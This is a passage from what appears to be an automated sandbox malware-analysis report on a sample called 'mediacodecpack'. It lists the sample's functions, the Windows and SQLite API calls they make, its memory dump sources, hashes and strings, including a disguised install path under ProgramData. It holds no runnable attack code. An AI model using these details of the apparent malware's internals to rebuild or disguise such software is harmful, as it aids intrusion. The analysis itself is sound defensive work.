                                                                                • __CxxThrowException@8.LIBCMT ref: 02D12810
                                                                                  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3074076210-2104205924
                                                                                • Opcode ID: 8b5de095ca79cfc8054fb6e67e5a3179bb7c7f6d4934b3bc84a64c5f0996b0f7
                                                                                • Instruction ID: b9098b180aff7b141608283d9fb0de2b6dbd2c9fd7eb1d139445a43d3028772b
                                                                                • Opcode Fuzzy Hash: 8b5de095ca79cfc8054fb6e67e5a3179bb7c7f6d4934b3bc84a64c5f0996b0f7
                                                                                • Instruction Fuzzy Hash: BBE0A03450021EB6DB01BAA4FD049AF777DEF00304F000595AC1462F90EB31DE48D9E1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D037B6
                                                                                • __localtime64.LIBCMT ref: 02D037C1
                                                                                  • Part of subcall function 02D11610: __gmtime64_s.LIBCMT ref: 02D11623
                                                                                • std::exception::exception.LIBCMT ref: 02D037D9
                                                                                  • Part of subcall function 02D114E3: std::exception::_Copy_str.LIBCMT ref: 02D114FC
                                                                                  • Part of subcall function 02D0952C: __EH_prolog.LIBCMT ref: 02D09531
                                                                                  • Part of subcall function 02D0952C: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D09540
                                                                                  • Part of subcall function 02D0952C: __CxxThrowException@8.LIBCMT ref: 02D0955F
                                                                                Strings
                                                                                • could not convert calendar time to UTC time, xrefs: 02D037CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                • String ID: could not convert calendar time to UTC time
                                                                                • API String ID: 1963798777-2088861013
                                                                                • Opcode ID: a46471f1d102cd230178fe64c35be9252090127a597f771192bfbb811b41efaf
                                                                                • Instruction ID: ab38cb4ff24c7efd308fe2081c76b66f4c4303a7025c90c262615f136f514db1
                                                                                • Opcode Fuzzy Hash: a46471f1d102cd230178fe64c35be9252090127a597f771192bfbb811b41efaf
                                                                                • Instruction Fuzzy Hash: BDE065B1D041199ACF00EFD4D5457EEB779FF50304F004595D82562751DB399E19CE90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                • API String ID: 1646373207-2713375476
                                                                                • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                • API String ID: 1646373207-3105848591
                                                                                • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                • Opcode Fuzzy Hash: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                APIs
                                                                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual$FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 714016831-0
                                                                                • Opcode ID: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                • Instruction ID: c10c021e120759eda6135e36457b27e0c23e5a43da849e4fe0a9db16ba58ca85
                                                                                • Opcode Fuzzy Hash: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                • Instruction Fuzzy Hash: 453142B65007029BD3309F24DD40B26B7E0EB88B54F10CA3AEA95B76D1E778A8448F4C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer_memmove
                                                                                • String ID:
                                                                                • API String ID: 1721217611-0
                                                                                • Opcode ID: ab1fdc08ba0f9b0001b3f4f22e608cec640e25dba6b7910461b295f0058b30ce
                                                                                • Instruction ID: 32cdfa474e67945e73bc497a507898e121205748a0b794f69d8ef4d3867fea43
                                                                                • Opcode Fuzzy Hash: ab1fdc08ba0f9b0001b3f4f22e608cec640e25dba6b7910461b295f0058b30ce
                                                                                • Instruction Fuzzy Hash: D341B035645342BEEB289F25F970BE633E5EF10764F24401DE89586FD1EB62ED80CA21
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D103CF
                                                                                  • Part of subcall function 02D03FDC: __EH_prolog.LIBCMT ref: 02D03FE1
                                                                                  • Part of subcall function 02D03FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D03FF3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D103C4
                                                                                • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D10410
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D104E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$CreateH_prolog
                                                                                • String ID:
                                                                                • API String ID: 2825413587-0
                                                                                • Opcode ID: 91e8563b43ae2d15d1feb3a9b116cb32d989de69c7bec14d8bd95ad115b44514
                                                                                • Instruction ID: 96c23505da20e68cea99f1c70b1901b2ae9ce6b1bfedff0dafd367ec3a52e43e
                                                                                • Opcode Fuzzy Hash: 91e8563b43ae2d15d1feb3a9b116cb32d989de69c7bec14d8bd95ad115b44514
                                                                                • Instruction Fuzzy Hash: 9551E171604309ABDB20EF28E884B5A77E4FF48329F154618FCA997780D735DC85CB91
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D1E2EC
                                                                                • __isleadbyte_l.LIBCMT ref: 02D1E31A
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D1E348
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D1E37E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: f53415c199010815f47e5c98500bfa680ff800c6a59ccfbc4c504f74d4850bff
                                                                                • Instruction ID: 5ddfad7da1d3d2a2e25fe05be8c9a61e34364dab28e7e2f705e267600f7d9c03
                                                                                • Opcode Fuzzy Hash: f53415c199010815f47e5c98500bfa680ff800c6a59ccfbc4c504f74d4850bff
                                                                                • Instruction Fuzzy Hash: FE31AD30604256BFEB258E75E844BAE7BA6FF41315F158629ECA487A90E730EC50DB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                • String ID:
                                                                                • API String ID: 1648232842-0
                                                                                • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 02D1DDD7
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,00000001,?,?,?,?), ref: 02D1DE34
                                                                                • GetLastError.KERNEL32(?,?,00000001,?,?,?,?), ref: 02D1DE50
                                                                                • _memset.LIBCMT ref: 02D1DE66
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 773584764-0
                                                                                • Opcode ID: c6c903628529cbcc0999159392276b4ffe54744da2bd56bfb93f0bf19d78d558
                                                                                • Instruction ID: 0fb16b02216908fc325963bf0b4b19823fd430601488a999b52367f05ab16d12
                                                                                • Opcode Fuzzy Hash: c6c903628529cbcc0999159392276b4ffe54744da2bd56bfb93f0bf19d78d558
                                                                                • Instruction Fuzzy Hash: 2B21CF71600340BBDF319F69F984BAA3B66DF52B25F0441A9F8494BB81EB308D41CBA1
                                                                                APIs
                                                                                • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 3429445273-0
                                                                                • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                APIs
                                                                                • htons.WS2_32(?), ref: 02D03DA2
                                                                                  • Part of subcall function 02D03BD3: __EH_prolog.LIBCMT ref: 02D03BD8
                                                                                  • Part of subcall function 02D03BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D03BED
                                                                                • htonl.WS2_32(00000000), ref: 02D03DB9
                                                                                • htonl.WS2_32(00000000), ref: 02D03DC0
                                                                                • htons.WS2_32(?), ref: 02D03DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                • String ID:
                                                                                • API String ID: 3882411702-0
                                                                                • Opcode ID: 8a0dfd7478b50b3421611b8db07b2a88cc8e440744f99c89508cf9cee6b90417
                                                                                • Instruction ID: 44f416a65f5b176d66bf574e3378bba0d4ba782bdb13aa83a3efa1c183832180
                                                                                • Opcode Fuzzy Hash: 8a0dfd7478b50b3421611b8db07b2a88cc8e440744f99c89508cf9cee6b90417
                                                                                • Instruction Fuzzy Hash: BB117C35A00219EFCF119F64E885EAAB7B9EF09315F018496FC04DF351E6719E28CBA5
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: " -V$C:\ProgramData\MediaCodecPack\MediaCodecPack.exe$alue
                                                                                • API String ID: 1586166983-459380645
                                                                                • Opcode ID: ed19379fccfba028bd2e664b2cb76df66c71dd7388b54506488c581a9a9bb581
                                                                                • Instruction ID: fe00abdb1b4a8e930eba483c141473a49fda8a139f54b1ead8ff061b0a42f72d
                                                                                • Opcode Fuzzy Hash: ed19379fccfba028bd2e664b2cb76df66c71dd7388b54506488c581a9a9bb581
                                                                                • Instruction Fuzzy Hash: 2B01B8B285C7819FD3068EB54941AA17F70FE01724328867FE1E26E1D2C77AD00BDB4A
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D023D0
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D023DE
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02401
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D02408
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: a9f686015a2fa42b13982bf71ec47d407d9e758c4dece89d2a9efaae2c498b30
                                                                                • Instruction ID: d928590323d0dc85e1f13e4f4574b7be5341669629102387dd85b1faaccad256
                                                                                • Opcode Fuzzy Hash: a9f686015a2fa42b13982bf71ec47d407d9e758c4dece89d2a9efaae2c498b30
                                                                                • Instruction Fuzzy Hash: 9A11CE71601304ABDB249F60ED88FAAB7B8FF54718F20446DEA019B290D7B1EC55CBA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction ID: bbdd88ab99c4875b84ee2d61558aaec2d52c0dcd8b191b4e83c6b4b89f854c4d
                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction Fuzzy Hash: AF014C7240114ABBCF126E94EC018EE3F33BF19354F488415FA6899631C336C9B5EB91
                                                                                APIs
                                                                                • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 2673540737-0
                                                                                • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                • String ID:
                                                                                • API String ID: 3526213481-0
                                                                                • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                APIs
                                                                                • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                  • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                  • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                • sqlite3_step.SQLITE3 ref: 60969197
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 2877408194-0
                                                                                • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D024A9
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D024B8
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D024CD
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D024D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 61e0f8eee9ad576660164a95c3b063aeb1f42e8fa1957af111c71ed02b3a0a22
                                                                                • Instruction ID: b9596236ab7c5d0be3ddd7efc520ac5b538e32702e74ddfc849b081286240d9e
